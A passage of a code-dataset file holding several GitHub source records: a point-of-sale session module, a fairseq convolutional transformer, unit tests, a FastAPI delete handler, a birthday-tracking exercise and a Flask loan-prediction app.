prompt and header at the\n # top (3) and a total and button at the bottom (4) and the\n # bottom border (2).\n h = h + 11\n super().__init__(h, 75, title=f\"Session {s.id}\",\n colour=ui.colour_input)\n self.win.drawstr(\n 2, 2, 56, f\"Please enter the actual takings for session {s.id}.\")\n self.win.drawstr(4, self.ttx, self.ffw, \"Till total:\", align=\">\")\n self.win.drawstr(4, self.atx, self.ffw, \"Actual total:\", align=\">\")\n self.win.drawstr(4, self.ftx, self.ffw, \"Fees:\", align=\">\")\n y = 5\n self.fl = []\n for pm in self.pms:\n pm.create_total_labels(y)\n self.win.drawstr(\n y, self.ttx, self.ffw, tillconfig.fc(pm.till_total),\n align=\">\")\n self.win.drawstr(y, 2, 18, f\"{pm.description}:\")\n if len(pm.total_fields) == 0:\n # No data entry; just the description\n pm.fields = []\n elif len(pm.total_fields) == 1:\n # Single field using the description with no indent\n field = pm.total_fields[0]\n f = ui.editfield(y, 20, 8, validate=field[1])\n self.fl.append(f)\n pm.fields.append(f)\n f.sethook = pm.update_total\n else:\n # Line with payment method description and totals, then\n # one line per field with indent\n for field in pm.total_fields:\n y = y + 1\n self.win.drawstr(y, 4, 16, f\"{field[0]}:\")\n f = ui.editfield(y, 20, 8, validate=field[1])\n self.fl.append(f)\n pm.fields.append(f)\n f.sethook = pm.update_total\n y = y + 1\n y = y + 1\n self.total_y = y\n self.total_label = ui.label(self.total_y, 2, self.ttx - 4)\n # Draw the till total now, because it doesn't change\n self.win.clear(self.total_y, self.ttx, 1, self.ffw,\n colour=ui.colour_confirm)\n self.win.drawstr(\n self.total_y, self.ttx, self.ffw,\n tillconfig.fc(self.till_total), colour=ui.colour_confirm,\n align=\">\")\n self.total_amount 
= ui.label(\n self.total_y, self.atx, self.ffw, align=\">\")\n self.fees_amount = ui.label(\n self.total_y, self.ftx, self.ffw, align=\">\")\n y = y + 2\n self.fl.append(ui.buttonfield(y, 27, 21, 'Record'))\n ui.map_fieldlist(self.fl)\n # Override key bindings for first/last fields\n self.fl[0].keymap[keyboard.K_CLEAR] = (self.dismiss, None)\n self.fl[-1].keymap[keyboard.K_CASH] = (self.finish, None)\n self.fl[0].focus()\n for pm in self.pms:\n pm.update_total()\n\n def update_total(self):\n \"\"\"A payment method wrapper has changed its total.\n\n Redraw the total line at the bottom of the window.\n \"\"\"\n if False in (pm.total_valid for pm in self.pms):\n self.total_label.set(\"Can't calculate total\",\n colour=ui.colour_error)\n self.total_amount.set(\"Error\", colour=ui.colour_error)\n self.fees_amount.set(\"Error\", colour=ui.colour_error)\n return\n total = sum(pm.actual_total for pm in self.pms)\n fees = sum(pm.fees for pm in self.pms)\n difference = self.till_total - total\n description = \"Total (DOWN by {})\"\n if difference == zero:\n description = \"Total (correct)\"\n elif difference < zero:\n difference = -difference\n description = \"Total (UP by {})\"\n colour = ui.colour_error if difference > Decimal(20) \\\n else ui.colour_input\n self.total_label.set(\n description.format(tillconfig.fc(difference)),\n colour=colour)\n self.total_amount.set(\n tillconfig.fc(total),\n colour=ui.colour_confirm)\n self.fees_amount.set(\n tillconfig.fc(fees),\n colour=ui.colour_confirm)\n\n @staticmethod\n def session_valid(session):\n \"\"\"Is the session eligible to have its totals recorded?\n\n The session object is assumed to be in the current ORM\n session.\n\n Returns True if the session is still valid, otherwise pops up\n an error dialog and returns False.\n \"\"\"\n if session.endtime is None:\n ui.infopopup([f\"Session {session.id} is not finished.\"],\n title=\"Error\")\n return False\n if session.actual_totals:\n ui.infopopup([f\"Session {session.id} has already had totals \"\n \"recorded.\"], title=\"Error\")\n return False\n return True\n\n def finish(self):\n session = td.s.query(Session).get(self.sessionid)\n if not self.session_valid(session):\n return\n for pm in self.pms:\n if not pm.total_valid:\n ui.infopopup(\n [f\"The {pm.description} payment method can't \"\n f\"supply an actual total at the moment.\", \"\",\n f\"Its error message is: {pm.total_problem}\", \"\",\n \"Please try again later.\"],\n title=\"Payment method error\")\n return\n for pm in self.pms:\n pt = td.s.query(PayType).get(pm.paytype_id)\n td.s.add(SessionTotal(\n session=session, paytype=pt, amount=pm.actual_total,\n fees=pm.fees))\n td.s.flush()\n user.log(f\"Recorded totals for session {session.logref}\")\n for pm in self.pms:\n pt = td.s.query(PayType).get(pm.paytype_id)\n r = pt.driver.commit_total(self.sessionid, pm.actual_total, pm.fees)\n if r is not None:\n td.s.rollback()\n ui.infopopup(\n [f\"Totals not recorded: {pm.description} payment \"\n f\"method says {r}\"],\n title=\"Payment method error\")\n return\n self.dismiss()\n for i in SessionHooks.instances:\n i.postRecordSessionTakings(session.id)\n if sessiontotal_print():\n ui.toast(\"Printing the confirmed session totals.\")\n with ui.exception_guard(\"printing the confirmed session totals\",\n title=\"Printer error\"):\n printer.print_sessiontotals(session.id)\n else:\n ui.toast(f\"Totals for session {session.id} confirmed.\")\n\n\n@user.permission_required('record-takings', \"Record takings for a session\")\ndef recordtakings():\n m = 
sessionlist(record, unpaidonly=True, closedonly=True)\n if len(m) == 0:\n log.info(\"Record takings: no sessions available\")\n ui.infopopup([\"Every session has already had its takings \"\n \"recorded. If you want to record takings for \"\n \"the current session, you must close it first.\"],\n title=\"Error\")\n else:\n log.info(\"Record takings: displaying menu\")\n ui.menu(m, title=\"Record Takings\",\n blurb=\"Select the session that you \"\n \"want to record the takings for, and press Cash/Enter.\")\n\n\ndef totalpopup(sessionid):\n \"\"\"Display popup session totals given a Session ID.\n \"\"\"\n s = td.s.query(Session).get(sessionid)\n log.info(\"Totals popup for session %d\", s.id)\n\n # All PayTypes\n all_pts = td.s.query(PayType)\\\n .order_by(PayType.order, PayType.paytype)\\\n .all()\n # list of (Dept, total) tuples\n depts = s.dept_totals\n # dict of {PayType: total} for transactions\n paytotals = dict(s.payment_totals)\n # dict of {PayType: SessionTotal} for actual amounts paid\n payments = {x.paytype: x for x in s.actual_totals}\n l = []\n l.append(f\" Accounting date {s.date} \")\n l.append(f\" Started {s.starttime:%Y-%m-%d %H:%M:%S} \")\n if s.endtime is None:\n l.append(\" Session is still open. \")\n else:\n l.append(f\" Ended {s.endtime:%Y-%m-%d %H:%M:%S} \")\n l.append(\"\")\n tf = ui.tableformatter(\" l pr r \")\n l.append(tf(\"\", \"Till:\", \"Actual:\"))\n ttt = zero\n att = zero\n for pt in all_pts:\n till_total = paytotals.get(pt, zero)\n ttt += till_total\n actual_total = payments[pt].amount if pt in payments else zero\n att += actual_total\n if till_total or actual_total:\n l.append(tf(pt.description + \":\",\n tillconfig.fc(till_total) if till_total else \"\",\n tillconfig.fc(actual_total) if actual_total else \"\"))\n l.append(tf(\"Total:\", tillconfig.fc(ttt),\n tillconfig.fc(att) if att else \"\"))\n if att and att != ttt:\n l.append(\" ({} by {})\".format(\n \"UP\" if att > ttt else \"DOWN\",\n tillconfig.fc(abs(att - ttt))))\n l.append(\"\")\n dt = zero\n df = ui.tableformatter(\" r l pr \")\n for dept, total in depts:\n l.append(df(\n dept.id, dept.description, tillconfig.fc(total)))\n dt = dt + total\n l.append(ui.tableformatter(\" l pr \")(\"Total\", tillconfig.fc(dt)))\n l.append(\"\")\n l.append(\" Press Print for a hard copy \")\n keymap = {\n keyboard.K_PRINT: (printer.print_sessiontotals, (s.id,), False),\n }\n ui.listpopup(l,\n title=f\"Session number {s.id}\",\n colour=ui.colour_info, keymap=keymap,\n dismiss=keyboard.K_CASH, show_cursor=False)\n\n\n@user.permission_required(\n \"session-summary\", \"Display a summary for any session\")\ndef summary(maxlen=100):\n log.info(\"Session summary popup\")\n m = sessionlist(totalpopup, maxlen=maxlen)\n if len(m) == maxlen:\n m.append((\"Show all\", summary, (None,)))\n ui.menu(m, title=\"Session Summary\", blurb=\"Select a session and \"\n \"press Cash/Enter to view the summary.\",\n dismiss_on_select=False)\n\n\n@user.permission_required('current-session-summary', \"Display a takings \"\n \"summary for the current session\")\ndef currentsummary():\n s = Session.current(td.s)\n if s is None:\n msg = [\"There is no session in progress.\", \"\"]\n # Show details of deferred transactions instead.\n deferred_total = td.s.query(func.sum(Transaction.total))\\\n .filter(Transaction.session == None)\\\n .scalar()\n if deferred_total:\n msg.append(\"There are deferred transactions totalling {}.\".format(\n tillconfig.fc(deferred_total)))\n else:\n msg.append(\"There are no deferred transactions.\")\n 
ui.infopopup(msg,\n title=\"No current session\",\n colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n return\n log.info(\"Totals popup for session %d (current)\", s.id)\n\n # list of (Dept, total, paid, pending) keyed tuples\n depts = s.dept_totals_closed\n paytotals = dict(s.payment_totals)\n l = []\n l.append(f\" Accounting date {s.date} \")\n l.append(f\" Started {s.starttime:%Y-%m-%d %H:%M:%S} \")\n l.append(\"\")\n tf = ui.tableformatter(\" l rp\")\n for pt in td.s.query(PayType)\\\n .order_by(PayType.order, PayType.paytype)\\\n .all():\n if pt in paytotals:\n l.append(tf(pt.description + \":\", tillconfig.fc(paytotals[pt])))\n l.append(\"\")\n paid_total = zero\n pending_total = zero\n total_total = zero\n df = ui.tableformatter(\" r l p r r r \")\n l.append(df(\n \"\", \"Department\", \"Paid\", \"Pending\", \"Total\"))\n for x in depts:\n if x.paid or x.pending:\n l.append(df(\n x.Department.id, x.Department.description,\n tillconfig.fc(x.paid) if x.paid else \"\",\n tillconfig.fc(x.pending) if x.pending else \"\",\n tillconfig.fc(x.total or zero)))\n paid_total += x.paid or zero\n pending_total += x.pending or zero\n total_total += x.total or zero\n l.append(df(\n \"\", \"Total:\", tillconfig.fc(paid_total), tillconfig.fc(pending_total),\n tillconfig.fc(total_total)))\n l.append(\"\")\n ui.listpopup(l,\n title=f\"Session number {s.id}\",\n colour=ui.colour_info,\n dismiss=keyboard.K_CASH, show_cursor=False)\n\n\n@user.permission_required(\n 'restore-deferred', 'Restore deferred transactions to the current session')\ndef restore_deferred():\n log.info(\"Restore deferred transactions\")\n user.log(\"Restored deferred transactions\")\n deferred = trans_restore()\n if deferred:\n ui.infopopup([\"The following deferred transactions were restored \"\n \"to this session:\", \"\"] + [\n f\"{d.id} — {d.notes}\" if d.notes else\n f\"{d.id}\" for d in deferred],\n title=\"Deferred transactions restored\",\n colour=ui.colour_confirm, dismiss=keyboard.K_CASH)\n else:\n ui.infopopup([\"There were no deferred transactions to be restored.\"],\n title=\"No transactions restored\", colour=ui.colour_confirm,\n dismiss=keyboard.K_CASH)\n\n\nclass SessionHooks(metaclass=InstancePluginMount):\n \"\"\"Hooks for sessions\n\n Accounting integration plugins should subclass this. Subclass\n instances will be called in order of creation. Calls will stop if\n an instance indicates that the action should not be taken.\n \"\"\"\n def preRecordSessionTakings(self, sessionid):\n \"\"\"Called before the Record Session Takings popup appears\n\n To prevent the popup from appearing, return True. You may pop\n up your own information box in this case.\n \"\"\"\n pass\n\n def postRecordSessionTakings(self, sessionid):\n \"\"\"Called after the Record Session Takings popup is completed.\n\n The session takings will have been flushed to the database,\n but the transaction will not yet have been committed. Some\n payment methods may have confirmed the session takings with\n external services.\n \"\"\"\n pass\n\n def preUpdateSessionTakings(self, sessionid):\n \"\"\"Called before the Update Session Takings popup appears\n\n To prevent the popup from appearing, return True. 
You may pop\n up your own information box in this case.\n \"\"\"\n pass\n\n def fetchReconciledSessionTakings(self, sessionid):\n \"\"\"Called during setup of the Update Session Takings popup\n\n The accounting system can provide a list of payment types that\n are already reconciled for this session and which must not be\n changed.\n \"\"\"\n return []\n\n def postUpdateSessionTakings(self, sessionid):\n \"\"\"Called after the Update Session Takings popup is finished\n\n The session takings will have been flushed to the database,\n but the transaction will not yet have been committed. Some\n payment methods may have confirmed the session takings with\n external services.\n \"\"\"\n pass\n\n\ndef menu():\n \"\"\"Session management menu.\"\"\"\n log.info(\"Session management menu\")\n menu = [\n (\"1\", \"Start a session\", start, None),\n (\"2\", \"End the current session\", end, None),\n (\"3\", \"Record session takings\", recordtakings, None),\n (\"4\", \"Display session summary\", summary, None),\n (\"5\", \"Restore deferred transactions\", restore_deferred, None),\n ]\n ui.keymenu(menu, title=\"Session management options\")\n","repo_name":"sde1000/quicktill","sub_path":"quicktill/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":26009,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"31726768125","text":"\"\"\"Convolutional Transformer\"\"\"\n\nfrom fairseq.models import (\n register_model,\n register_model_architecture,\n)\nfrom fairseq.models.transformer import (\n TransformerModel,\n TransformerEncoder,\n base_architecture\n)\n\nfrom fairseq.modules.checkpoint_activations import checkpoint_wrapper\n\nfrom .convtransformer_layer import ConvTransformerEncoderLayer\n\n\n@register_model('convtransformer')\nclass ConvTransformerModel(TransformerModel):\n \"\"\"\n Args:\n encoder (ConvTransformerEncoder): the encoder\n decoder (TransformerDecoder): the decoder\n\n The Transformer model provides the following named architectures and\n command-line arguments:\n\n .. argparse::\n :ref: fairseq.models.transformer_parser\n :prog:\n \"\"\"\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add model-specific arguments to the parser.\"\"\"\n # fmt: off\n super(ConvTransformerModel, ConvTransformerModel).add_args(parser)\n parser.add_argument('--context_size', type=int, default=3,\n help='sets context size for convolutional layers')\n\n @classmethod\n def build_encoder(cls, args, src_dict, embed_tokens):\n return ConvTransformerEncoder(args, src_dict, embed_tokens)\n\n\nclass ConvTransformerEncoder(TransformerEncoder):\n \"\"\"\n ConvTransformer encoder consisting of *args.encoder_layers* layers. Each layer\n is a :class:`ConvTransformerEncoderLayer`.\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n dictionary (~fairseq.data.Dictionary): encoding dictionary\n embed_tokens (torch.nn.Embedding): input embedding\n \"\"\"\n\n def build_encoder_layer(self, args):\n layer = ConvTransformerEncoderLayer(args)\n if getattr(args, \"checkpoint_activations\", False):\n layer = checkpoint_wrapper(layer)\n return layer\n\n\n@register_model_architecture(\"convtransformer\", \"convtransformer\")\ndef convtransformer(args):\n base_architecture(args)\n args.context_size = getattr(args, \"context_size\", 3)\n","repo_name":"quentin-burthier/MT_UGC","sub_path":"convtransformer/convtransformer_model.py","file_name":"convtransformer_model.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17007090873","text":"import numpy as np\nimport pytest\n\nfrom cherab.inversion.derivative import compute_dmat\n\n# valid cases\nCASES = [\n {\n \"vmap\": np.arange(6).reshape(2, 3),\n \"kernel_type\": \"x\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [-1, 1, 0, 0, 0, 0],\n [0, -1, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, -1, 1, 0],\n [0, 0, 0, 0, -1, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(2, 3),\n \"kernel_type\": \"z\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [-1, 1, 0, 0, 0, 0],\n [0, -1, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, -1, 1, 0],\n [0, 0, 0, 0, -1, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 2),\n \"kernel_type\": \"y\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [-1, 0, 1, 0, 0, 0],\n [0, -1, 0, 1, 0, 0],\n [0, 0, -1, 0, 1, 0],\n [0, 0, 0, -1, 0, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 2),\n \"kernel_type\": \"r\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [-1, 0, 1, 0, 0, 0],\n [0, -1, 0, 1, 0, 0],\n [0, 0, -1, 0, 1, 0],\n [0, 0, 0, -1, 0, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(2, 1, 3),\n \"kernel_type\": \"laplacian4\",\n \"expected\": np.array(\n [\n [-4, 1, 0, 1, 0, 0],\n [1, -4, 1, 0, 1, 0],\n [0, 1, -4, 0, 0, 1],\n [1, 0, 0, -4, 1, 0],\n [0, 1, 0, 1, -4, 1],\n [0, 0, 1, 0, 1, -4],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 1, 2),\n \"kernel_type\": \"laplacian8\",\n \"expected\": np.array(\n [\n [-8, 1, 1, 1, 0, 0],\n [1, -8, 1, 1, 0, 0],\n [1, 1, -8, 1, 1, 1],\n [1, 1, 1, -8, 1, 1],\n [0, 0, 1, 1, -8, 1],\n [0, 0, 1, 1, 1, -8],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 1, 2),\n \"kernel_type\": \"custom\",\n \"kernel\": np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]]),\n \"expected\": np.array(\n [\n [-4, 1, 1, 0, 0, 0],\n [1, -4, 0, 1, 0, 0],\n [1, 0, -4, 1, 1, 0],\n [0, 1, 1, -4, 0, 1],\n [0, 0, 1, 0, -4, 1],\n [0, 0, 0, 1, 1, -4],\n ]\n ),\n },\n]\n\n# invalid cases\nINVALID_CASES = [\n {\n \"vmap\": np.zeros((2, 2, 2)), # invalid shape\n \"kernel_type\": \"x\",\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((4, 3)),\n \"kernel_type\": \"_\", # invalid kernel type\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((3, 5)),\n \"kernel_type\": \"custom\",\n \"kernel\": np.zeros((2, 2, 2)), # invalid kernel dimension\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((5, 5)),\n \"kernel_type\": \"custom\",\n \"kernel\": np.zeros((2, 2)), # invalid kernel shape\n \"error\": ValueError,\n },\n]\n\n\ndef test_compute_dmat():\n # valid tests\n for case in CASES:\n vmap = case[\"vmap\"]\n kernel_type = case[\"kernel_type\"]\n if kernel_type == \"custom\":\n kernel = case[\"kernel\"]\n dmat = compute_dmat(vmap, kernel_type=kernel_type, kernel=kernel)\n else:\n dmat = compute_dmat(vmap, kernel_type=kernel_type, kernel=None)\n assert np.allclose(dmat.A, case[\"expected\"])\n\n # invalid tests\n for case in INVALID_CASES:\n vmap = case[\"vmap\"]\n kernel_type = case[\"kernel_type\"]\n if kernel_type == \"custom\":\n kernel = case[\"kernel\"]\n with pytest.raises(case[\"error\"]):\n compute_dmat(vmap, kernel_type=kernel_type, kernel=kernel)\n else:\n with pytest.raises(case[\"error\"]):\n compute_dmat(vmap, kernel_type=kernel_type, kernel=None)\n\n\nif __name__ == \"__main__\":\n 
test_compute_dmat()\n","repo_name":"munechika-koyo/cherab_inversion","sub_path":"cherab/inversion/tests/test_derivative.py","file_name":"test_derivative.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11961065135","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import sessionmaker\nfrom db.connection import engine\nfrom db.models import Account_book\nfrom datetime import datetime\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef delete_account_book(user_id, no=None):\n try:\n if no:\n data = session.query(Account_book).filter_by(no=no, user_id=user_id, status=True).first()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(no=no, user_id=user_id, status=True). \\\n update({\"status\": False, \"create_time\": datetime.now()})\n session.commit()\n result = JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"데이터 삭제 완료.\"})\n\n else:\n data = session.query(Account_book).filter_by(user_id=user_id, status=True).all()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(user_id=user_id, status=True). \\\n update({\"status\": False, \"create_time\": datetime.now()})\n session.commit()\n result = JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"모든 데이터가 삭제 완료.\"})\n\n return result\n\n except HTTPException as err:\n raise err\n\n except Exception as err:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(err))\n\n finally:\n session.close()\n","repo_name":"kimhyongkui/account_book","sub_path":"db/delete/account_book.py","file_name":"account_book.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71512499394","text":"\"\"\" test_googleMapsApi\n * all basic-tests for Google-Maps-API are implemented here\n author: inf20086@lehre.dhbw-stuttgart.de\n date: 22.03.2023\n version: 0.0.1\n license: MIT\n\"\"\"\n\nfrom unittest import TestCase\nfrom morning.googleMapsApi import GoogleMapsApi\nfrom datetime import datetime, timedelta\nimport json, os\n\nGMA = GoogleMapsApi()\n\n\nclass TestGoogleMapsApi(TestCase):\n\n def test_parameterValid(self):\n string_correct = \"url&mode=transit&arrival_time=1704021753&origins=origin&destinations=dest\"\n datetime_str = '12/31/23 11:22:33'\n datetime_object = datetime.strptime(datetime_str, '%m/%d/%y %H:%M:%S')\n\n string_to_test = GMA.parameter_valid(\"transit\", \"origin\", \"dest\", datetime_object, \"url\")\n\n self.assertEqual(string_correct, string_to_test)\n\n def test_travelModeValid(self):\n self.assertEqual(True, GMA.travel_mode_valid(\"walking\"))\n\n def test_originIsString(self):\n self.assertEqual(True, GMA.origin_is_string(\"iFartInYourGeneralDirection\"))\n\n def test_destinationIsString(self):\n self.assertEqual(True, GMA.destination_is_string(\"tisButAScratch\"))\n\n def test_getDuration(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = \"1 hour 56 minutes\"\n self.assertEqual(correct_string, GMA.get_duration(data))\n\n def test_getDistance(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = \"69.1 kilometer\"\n self.assertEqual(correct_string, GMA.get_distance(data))\n\n def test_getDurationValue(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = 6969\n self.assertEqual(correct_string, GMA.get_duration_value(data))\n\n def test_getDistanceValue(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = 42069\n self.assertEqual(correct_string, GMA.get_distance_value(data))\n\n def test_googleMapsApiRequest(self):\n correct_string = ('33.0 kilometer', '1 hour 30 minutes')\n tom_date = datetime.now() + timedelta(1)\n tom_day = tom_date.day\n tom_month = tom_date.month\n tom_year = tom_date.year\n\n self.assertEqual(correct_string, GMA.google_maps_api_request(\"Filderstadt\", \"Stuttgart\", 'transit',\n arrival_time=datetime(tom_year, tom_month, tom_day,\n 3)))\n","repo_name":"PrimitiveEngineering/DigAs","sub_path":"test/morning_tests/test_googleMapsApi.py","file_name":"test_googleMapsApi.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37455074765","text":"# Exercises 33, 34, 35 and 36\n\n# For this exercise, we will keep track of when our friend’s birthdays are, and \n# be able to find that information based on their name. Create a dictionary (in your file) \n# of names and birthdays. When you run your program it should ask the user to enter a name, \n# and return the birthday of that person back to them.\n\n# In the previous exercise we saved information about famous scientists’ names and birthdays to disk. \n# In this exercise, load that JSON file from disk, extract the months of all the birthdays, \n# and count how many scientists have a birthday in each month.\n\n# Load the JSON file from disk, extract the months of all the birthdays, \n# and count how many scientists have a birthday in each month.\n\n# In this exercise, use the bokeh Python library to plot a histogram of which months the scientists \n# have birthdays in! Because it would take a long time for you to input the months of various scientists, \n# you can use my scientist birthday JSON file. Just parse out the months \n# (if you don’t know how, I suggest looking at the previous exercise or its solution) and draw your histogram.\n\nbirthdays = {\n \"Fede\": \"09/12/1990\", \n \"Juli\": \"02/27/1993\", \n \"Patri\": \"06/03/1962\"\n}\nimport bokeh.plotting\nimport json\nfrom collections import Counter\n\nnum_to_string = {\n\t1: \"January\",\n\t2: \"February\",\n\t3: \"March\", \n\t4: \"April\",\n\t5: \"May\",\n\t6: \"June\",\n\t7: \"July\",\n\t8: \"August\",\n\t9: \"September\",\n\t10: \"October\",\n\t11: \"November\",\n\t12: \"December\"\n}\n\nwith open(\"birthdays.json\", \"r\") as f:\n birthdays = json.load(f)\n\n\nprint(\"Welcome to the birthday dictionary. We know the birthdays of:\")\nfor name in birthdays:\n print(name)\n\nnewName = input(\"New person's name: \")\n\nif newName not in birthdays.keys():\n newBirthday = input(\"New person's birthday: \")\n birthdays[newName] = newBirthday\nelse:\n print(\"That person's birthday was already added.\")\n\n# print(birthdays)\n\nmonths = []\nfor name, birthday_string in birthdays.items():\n month = int(birthday_string.split(\"/\")[0])\n months.append(num_to_string[month])\n\nmonths = Counter(months)\n# print(months)\n\nwith open('birthdays.json', 'w') as f:\n json.dump(birthdays, f)\nprint('{} was added to the birthday list\\n'.format(newName))\n\nmonths_name = list(months.keys())\nmonths_quantity = list(months.values())\n\nbokeh.plotting.output_file('plot.html')\nplot = bokeh.plotting.figure(x_range=list(num_to_string.values()))\nplot.vbar(x=months_name, top=months_quantity, width=0.7)\nbokeh.plotting.show(plot)\n\nname = input(\"Who's birthday do you want to look up?: \")\nif name in birthdays:\n print('{}\\'s birthday is {}.'.format(name, birthdays[name]))\nelse:\n print('Sadly, we don\\'t have {}\\'s birthday.'.format(name))\n\n","repo_name":"fhenseler/practicepython","sub_path":"33-34-35-36.py","file_name":"33-34-35-36.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34347594703","text":"from flask import Flask, request, render_template\nfrom markupsafe import escape\nimport pickle\nimport numpy as np\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n model = pickle.load(open('model.pkl', 'rb'))\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n img_url =\"https://plus.unsplash.com/premium_photo-1679856789519-790899bcaa09?q=80&w=1374&auto=format&fit=crop&ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D\"\n\n return render_template(\"index.html\",img_url=img_url)\n\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n gender = request.form['gender']\n married = request.form['married']\n dependents = request.form['dependents']\n education = request.form['education']\n employed = request.form['employed']\n credit = float(request.form['credit'])\n area = request.form['area']\n ApplicantIncome = float(request.form['ApplicantIncome'])\n CoapplicantIncome = float(request.form['CoapplicantIncome'])\n LoanAmount = float(request.form['LoanAmount'])\n Loan_Amount_Term = float(request.form['Loan_Amount_Term'])\n\n # gender\n if (gender == \"Male\"):\n male=1\n else:\n male=0\n \n # married\n if(married==\"Yes\"):\n married_yes = 1\n else:\n married_yes=0\n\n # dependents\n if(dependents=='1'):\n dependents_1 = 1\n dependents_2 = 0\n dependents_3 = 0\n elif(dependents == '2'):\n dependents_1 = 0\n dependents_2 = 1\n dependents_3 = 0\n elif(dependents==\"3+\"):\n dependents_1 = 0\n dependents_2 = 0\n dependents_3 = 1\n else:\n dependents_1 = 0\n dependents_2 = 0\n dependents_3 = 0 \n\n # education\n if (education==\"Not Graduate\"):\n not_graduate=1\n else:\n not_graduate=0\n\n # employed\n if (employed == \"Yes\"):\n employed_yes=1\n else:\n employed_yes=0\n\n # property area\n\n if(area==\"Semiurban\"):\n semiurban=1\n urban=0\n elif(area==\"Urban\"):\n semiurban=0\n urban=1\n else:\n semiurban=0\n urban=0\n\n\n ApplicantIncomelog = np.log(ApplicantIncome)\n totalincomelog = np.log(ApplicantIncome+CoapplicantIncome)\n LoanAmountlog = np.log(LoanAmount)\n Loan_Amount_Termlog = np.log(Loan_Amount_Term)\n\n prediction = model.predict([[credit, ApplicantIncomelog,LoanAmountlog, Loan_Amount_Termlog, totalincomelog, male, married_yes, dependents_1, dependents_2, dependents_3, not_graduate, employed_yes,semiurban, urban ]])\n\n # print(prediction)\n\n if(prediction==\"N\"):\n prediction=\"Not Approved\"\n else:\n prediction=\"Approved\"\n\n\n return render_template(\"prediction.html\", prediction_text=\"---->Your Loan Status is {}\".format(prediction))\n\n\n\n\n else:\n return render_template(\"prediction.html\")\n\n\n\n@app.route('/aboutus')\ndef aboutus():\n img_url =\"https://drive.google.com/uc?id=1NvB5xttWt0-j_dzXh8DiVTx3Ja7Pz7Y_\"\n return render_template(\"aboutus.html\", img_url=img_url)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"nishanttG/LoanPredict","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
